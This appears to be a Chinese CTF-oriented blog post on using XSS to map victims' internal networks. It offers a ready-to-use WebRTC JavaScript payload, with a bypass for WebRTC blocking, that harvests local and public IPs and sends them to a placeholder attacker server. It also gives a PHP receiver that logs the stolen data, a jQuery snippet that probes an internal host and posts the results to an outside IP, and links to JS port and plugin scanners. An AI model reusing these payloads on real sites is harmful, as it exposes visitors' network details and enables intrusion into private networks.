Web XSS内网渗透——寻找内网IP

author: iflody

在BCTF中使用了BeEF,估计是相当于探针一样的东西,但是BeEF使用起来仍然繁琐,在web题目中使用BeEF着实大材小用,或者说不太现实,现在先总结一部分内容到这里,以备下次使用。

这个技术就是说 Firefox 和 Chrome 内建的 WebRTC 允许向 STUN 服务器查询用户的本地和公共 IP 地址。查询结果对 javascript 可用,所以可以使用 javascript 得到用户的本地和公网地址。

折腾了好久,js基础比较差劲,找到了webRTC的实现,通过把返回的结果new Image到我的steal.php再写入到txt中,已经测试通过,直接将一下代码中的url部分修改即可使用,希望能给各位带来方便。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
//获取IP
function getIPs(callback){
var ip_dups = {};
//compatibility for firefox and chrome
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
var useWebKit = !!window.webkitRTCPeerConnection;
//bypass naive webrtc blocking
if(!RTCPeerConnection){
//create an iframe node
var iframe = document.createElement('iframe');
iframe.style.display = 'none';
//invalidate content script
iframe.sandbox = 'allow-same-origin';
//insert a listener to cutoff any attempts to
//disable webrtc when inserting to the DOM
iframe.addEventListener("DOMNodeInserted", function(e){
e.stopPropagation();
}, false);
iframe.addEventListener("DOMNodeInsertedIntoDocument", function(e){
e.stopPropagation();
}, false);
//insert into the DOM and get that iframe's webrtc
document.body.appendChild(iframe);
var win = iframe.contentWindow;
RTCPeerConnection = win.RTCPeerConnection
|| win.mozRTCPeerConnection
|| win.webkitRTCPeerConnection;
useWebKit = !!win.webkitRTCPeerConnection;
}
//minimal requirements for data connection
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
//firefox already has a default stun server in about:config
// media.peerconnection.default_iceservers =
// [{"url": "stun:stun.services.mozilla.com"}]
var servers = undefined;
//add same stun server for chrome
if(useWebKit)
servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
//construct a new RTCPeerConnection
var pc = new RTCPeerConnection(servers, mediaConstraints);
function handleCandidate(candidate){
//match just the IP address
var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
var ip_addr = ip_regex.exec(candidate)[1];
//remove duplicates
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
ip_dups[ip_addr] = true;
}
//listen for candidate events
pc.onicecandidate = function(ice){
//skip non-candidate events
if(ice.candidate)
handleCandidate(ice.candidate.candidate);
};
//create a bogus data channel
pc.createDataChannel("");
//create an offer sdp
pc.createOffer(function(result){
//trigger the stun server request
pc.setLocalDescription(result, function(){}, function(){});
}, function(){});
//wait for a while to let everything done
setTimeout(function(){
//read candidate info from local description
var lines = pc.localDescription.sdp.split('\n');
lines.forEach(function(line){
if(line.indexOf('a=candidate:') === 0)
handleCandidate(line);
});
}, 1000);
}
//将结果返回到服务器
getIPs(function(ip){
var li = document.createElement("li");
li.textContent = ip;
//local IPs
if (ip.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/)){
new Image().src="http://你的服务器地址/接收程序?ip="+escape(ip);
}
//assume the rest are public IPs
else{
new Image().src="http://你的服务器地址/接收程序?ip="+escape(ip);
}
});

以上代码只需要修改这部分即可,其余部分按需修改。

1
new Image().src="http://你的服务器地址/接收程序?ip="+escape(ip);

而我的接收程序的phpdaima

1
2
3
4
5
<?php
$file = fopen("file.txt", "a");
fwrite($file, "\n\n\nip:". $_GET['ip']. " port:" .$_GET['post']);
fclose($file);
?>

这个是针对chrome和firefox浏览器才能使用的,虽然这两个浏览器已经覆盖了绝大多数情况,但是我们还是得需要普通的办法来应对特殊的情况,这里介绍使用JQ库的方法来进行更一般的操作

1
2
3
jQuery.get( "http://192.168.1.1", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: "192.168.1.1"} );
});

这个方法请求指定的目标url,然后将请求到的数据post到app_dev.php,上面的php中的get方法换成post即可, { x: "192.168.1.1"} 中的内容可控,可以直接把返回的数据完全返回,但是这里只是请求IP是否存在。
这个方法就是暴力膜。

而这个方法和上面的方法结合使用,也可以在获取到内网IP的情况下猜测端口,获取指定端口的返回数据,应用就更多啦。

若有再补充。

还找到了个利用js渗透内网的poc,获取flash版本java版本之类的,放个链接给大家参考下。

1
2
3
4
5
6
7
8
9
10
11
12
13
获得flash版本 http://jsbin.com/rukirayuca

获得java版本 http://jsbin.com/cabirudale

获得插件列表 http://jsbin.com/vejujatuxa

获得内网IP http://jsbin.com/riyisavura

扫描HTTP端口 http://jsbin.com/ziwununivo

扫描WEB容器 http://jsbin.com/piwemaquwa

扫描FTP端口 http://jsbin.com/kulahicide

还有就是希望谁能来补充一下利用curl反向代理渗透内网的方法,我认为这个原理大同小异,仍然是暴力膜..但是webRTC是一个很重要的技巧,这里着重介绍。